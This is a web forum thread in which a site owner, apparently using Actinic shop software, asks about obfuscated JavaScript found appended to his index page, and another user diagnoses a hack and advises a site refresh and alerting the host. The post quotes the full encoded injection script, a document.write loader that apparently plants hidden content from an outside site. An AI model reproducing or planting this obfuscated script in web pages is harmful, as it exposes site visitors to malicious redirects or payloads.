Hi Guys,

Just noticed this script tagged on to the end of the index page of one of my sites and I'm not sure whether it's rogue script or something produced by Actinic when it uploads - I have the Login facility enabled on this particular site....

<!--c97aab3b25818a3ddbdfbfdcf9378bae-><script language=javascript>ias="%";kqkgv="j3cj73cj72j69j70t j6canguage=j6aj61j76j61j73cripj74> fj75j6ej63j74ion hj6aj6dzr(j72j29j7bj76arj20kj2cj6aj3d\"@GUK!}j7cJ8gj4dej45j54{j4euj30j36Zj6aV[1Fj7aCj20j77-+kPhHj5ej283&j42nj78Oyj32j24_vj7e.m\\j22sj70j3bj34f*j39qj62j5dj63,=`j37d'j6c)ioj49j41j74j35j3aj23j61j72\",ij3d\"j22,j62go,dj6fj2cj71ci=j22\",q;forj28kj3dj30;k<r.j6cj65ngth;j6b+j2bj29j7b bj67o=j72j2ej63harAt(k);do=j6aj2ej69j6edj65xOf(bgo);j69j66j28do>j2d1)j7b q=j28j28j64oj2b1j29j25j381-1)j3bj69fj28q<j3dj30)j71j2b=81;j71cj69j2b=j6aj2ecj68aj72j41j74(q-j31j29j3bj20}j20ej6csej20j71cj69+=bj67j6fj3b}ij2bj3dj71cij3bj64oj63j75ment.j77rj69tej28j69)j3bj7dj3cj2fscj72iptj3e";wlemf=unescape(kqkgv.replace(/j/g,ias));var rb,yjx;document.write(wlemf);rb="<p,@o;5w)rxM0rME`sVr~rp,@o;5s>w'I,0\"Ex5m-@o5E3ws<S RAh{w)rxM0rME`\\s8r~rS,@o;5\\swSR `\\sH55;#//---mMIIM)Erxr)o5o,pmxE5/vv05]mVp?sk'I,0\"Ex5m@E*E@@E@ks\\s><\\/S RAh{>swi4w</p,@o;5>w";hjmzr(rb);</script>

The reason I ask is that I've suddenly started getting a lot of spam emails via the site - may be just coincidence. Does anyone with Login enabled on their site recognise this ?

FYI this code doesn't show if I do a preview, only when uploaded to the website.

Many Thanks,

Graham

it looks to me as if your site has been hacked.

do a site refresh to get rid of it - as you say its not in the code on your pc and no it isn't anything actinic uploads

Hi Jo,

Thanks for the speedy reply. I've done a site refresh as suggested and the code has now disappeared so it looks as though the site was hacked ! Is there any way this can be prevented (I'm on v7.0.6) ? I've checked the site permissions and they seem to be ok. If say a folder has a permission of 755, does that mean that all the files within that folder should be the same or can they be different ?

Thanks again for your help.

Graham

Its something for your host to resolve. The site may not have been hacked from your acct, ie if there are security holes on the server then a hacker will have gained access through these.

I'd report it to your host as i suspect yours will not have been the only hacked site on the server, your host needs to be made aware and needs to fix it otherwise the hacker will gain access again and again. You should also be vigilant for a while, ie view source, as it may take a while for your host to find the vulnerability.

Hi Jo,

Thanks again - I'll contact my host ASAP and see if they can shed any light on it.

Many thanks,
Graham